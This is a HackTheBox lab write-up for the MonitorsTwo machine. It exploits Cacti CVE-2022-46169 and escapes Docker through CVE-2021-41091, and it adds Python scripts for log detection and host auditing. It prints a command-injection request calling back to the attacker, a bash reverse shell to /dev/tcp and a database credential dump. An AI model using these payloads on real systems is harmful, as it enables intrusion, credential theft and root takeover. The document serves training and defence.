HackTheBox — MonitorsTwo

ARZ101
4 min read · Sep 1, 2023

MonitorsTwo involved exploiting Cacti, which was vulnerable to unauthenticated remote code execution (CVE-2022-46169). That gives a shell as www-data inside a Docker container; privileges are escalated to root in the container through capsh, and then root on the host is obtained by abusing CVE-2021-41091, a flaw in Docker Engine that allows users on the host to execute files from Docker images.

NMAP

Nmap scan report for 10.10.11.211
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Trying the default creds for Cacti, admin:admin and admin:cactipw, which didn't work.

Searching for vulnerabilities in Cacti 1.2.22 turns up an unauthenticated RCE (CVE-2022-46169).

Foothold

We can reproduce this with the GET request below, which makes the target call back to our web server; a hit on it confirms that command execution is working.

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+10.10.14.142` HTTP/1.1
Host: 10.10.11.211
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Cacti=b7c2b58f33ea788f827a4d4bbe435deb; CactiDateTime=Thu May 04 2023 20:36:02 GMT+0500; CactiTimeZone=300
Upgrade-Insecure-Requests: 1
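From the defender's side, the request above leaves a recognizable trace in the web server log: a hit on remote_agent.php whose poller_id is not the integer Cacti expects, combined with an X-Forwarded-For header claiming a loopback address while the connection comes from elsewhere. The Python below is an added example, not code from this writeup; it assumes an nginx log format of the standard combined format with a trailing quoted $http_x_forwarded_for field (an assumption, not something the writeup states about the box), and the sample log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log format (an assumption of this example): nginx "combined" with one
# extra quoted field, $http_x_forwarded_for, appended at the end of each line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"(?: "(?P<xff>[^"]*)")?$'
)

# Cacti expects poller_id to be an integer; any of these characters in it is a
# strong indicator of the CVE-2022-46169 command-injection pattern.
SHELL_META = re.compile(r"[`;|&]|\$\(")

NON_NUMERIC = "non-numeric poller_id"
SHELL_CHARS = "shell metacharacters in poller_id"
SPOOFED_XFF = "loopback X-Forwarded-For from non-loopback client"


def _to_ip(text):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def analyze_line(line):
    """Return None for lines that do not touch remote_agent.php, otherwise a
    record with the list of indicators found (empty for a benign poller hit)."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    if not url.path.endswith("/remote_agent.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    poller_id = params.get("poller_id", [""])[0]  # parse_qs URL-decodes for us
    reasons = []
    if poller_id and not poller_id.isdigit():
        reasons.append(NON_NUMERIC)
    if SHELL_META.search(poller_id):
        reasons.append(SHELL_CHARS)
    # The authorization bypass relies on a forged X-Forwarded-For. A loopback
    # value arriving from a non-loopback client is not how a real proxy behaves.
    xff, src = rec.get("xff"), _to_ip(rec["src"])
    if xff and xff != "-":
        forwarded = _to_ip(xff.split(",")[0])
        if (forwarded is not None and forwarded.is_loopback
                and src is not None and not src.is_loopback):
            reasons.append(SPOOFED_XFF)
    return {"src": rec["src"], "time": rec["time"],
            "poller_id": poller_id, "reasons": reasons}


def scan(lines):
    """Return only the records that carry at least one indicator."""
    hits = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


# Constructed sample log lines for this example (not captured from the box).
SAMPLE_LOG = [
    # exploit-style request, raw backticks in poller_id, forged loopback XFF
    '10.10.14.142 - - [04/May/2023:20:36:02 +0500] "GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+10.10.14.142` HTTP/1.1" 200 512 "-" "Mozilla/5.0" "127.0.0.1"',
    # same pattern with the payload URL-encoded
    '10.10.14.142 - - [04/May/2023:20:36:05 +0500] "GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=%60curl+10.10.14.142%60 HTTP/1.1" 200 512 "-" "curl/7.88.1" "127.0.0.1"',
    # legitimate remote poller from an internal address, integer poller_id, no XFF
    '172.18.0.3 - - [04/May/2023:20:36:10 +0500] "GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=1 HTTP/1.1" 200 512 "-" "Cacti-Poller" "-"',
    # unrelated page, ignored
    '10.10.14.142 - - [04/May/2023:20:36:12 +0500] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["src"], "->", ", ".join(hit["reasons"]))
```

The integer check on poller_id is the durable signal: it catches encoded and unencoded variants alike, while the forged X-Forwarded-For check only fires when the proxy header is actually logged.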

We can get a reverse shell using a bash payload:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.142/2222 0>&1"

Checking the hostname reveals that we are in a Docker container.

Privilege Escalation (marcus)

Reading the entrypoint.sh file, we find the MySQL creds, which are root:root.

From here, we query the users from the user_auth table:

mysql --host=db --user=root --password=root -e "use cacti;show tables; select * from user_auth;"

Cracking these two hashes, marcus's is the one that cracks.

Reading the mail in /var/mail/marcus.

The mail talks about three CVEs, of which CVE-2021-41091 stands out, as the Docker version on this machine is 20.10.5.

There's a really nice article on how to abuse this. The short summary: we need bash, or any binary that can spawn bash, owned by root with the SUID bit set inside the container; then, from the host machine, we access the overlay filesystem of that container and execute the binary, which grants us root privileges on the host.

Since we are not root on the actual host, we can't just spawn a shell in the container and make bash SUID. Running linpeas in the Docker container shows that capsh has the SUID bit set, which means we can spawn bash as root.

After doing this, run findmnt on the host to find the Docker container's overlay filesystem.
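For the host side of this chain, the conditions worth auditing are the Docker Engine version (the fix for CVE-2021-41091 shipped in 20.10.9), whether the data root (typically /var/lib/docker) is traversable by other users, and whether container filesystems carry setuid binaries such as capsh. The Python below is an added example, not code from this writeup. The demo layout it builds under a temporary directory is a constructed stand-in for the real data root and image filesystem, and the capsh it creates is an empty placeholder file, not the real binary.

```python
import os
import re
import stat
import tempfile

# Docker Engine / Moby release that fixed CVE-2021-41091 by tightening the
# permissions of the data root (typically /var/lib/docker).
FIXED_VERSION = (20, 10, 9)


def parse_version(text):
    """Accept '20.10.5' or the full 'Docker version 20.10.5, ...' string."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(part) for part in m.groups())


def engine_is_patched(version_text):
    return parse_version(version_text) >= FIXED_VERSION


def world_traversable(path):
    """True if 'other' users hold the execute (traverse) bit on a directory."""
    return bool(os.stat(path).st_mode & stat.S_IXOTH)


def find_setuid_files(root):
    """Walk a container filesystem (e.g. an overlay lower or merged dir) and
    return the setuid regular files found, relative to root."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def audit(version_text, data_root, image_roots=()):
    """Collect the findings a host admin would want for this escalation path."""
    findings = []
    if not engine_is_patched(version_text):
        findings.append(
            f"engine {parse_version(version_text)} predates the 20.10.9 fix for CVE-2021-41091")
    if os.path.isdir(data_root) and world_traversable(data_root):
        findings.append(f"data root {data_root} is traversable by other users")
    for root in image_roots:
        for rel in find_setuid_files(root):
            findings.append(f"setuid file in container filesystem {root}: {rel}")
    return findings


def build_demo_layout():
    """Constructed fixture mimicking the vulnerable state: a world-traversable
    data root and an image root containing a setuid file named capsh
    (an empty placeholder, not the real binary)."""
    data_root = tempfile.mkdtemp(prefix="demo-docker-root-")
    os.chmod(data_root, 0o711)
    image_root = tempfile.mkdtemp(prefix="demo-image-")
    sbin = os.path.join(image_root, "usr", "sbin")
    os.makedirs(sbin)
    capsh = os.path.join(sbin, "capsh")
    with open(capsh, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(capsh, 0o4755)
    return data_root, image_root


if __name__ == "__main__":
    demo_data_root, demo_image_root = build_demo_layout()
    for finding in audit("20.10.5", demo_data_root, [demo_image_root]):
        print(finding)
```

On a real host, point data_root at the engine's data root and image_roots at the overlay directories findmnt reports; the setuid scan is the same check linpeas performs from inside the container, run from the outside before an image is deployed.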
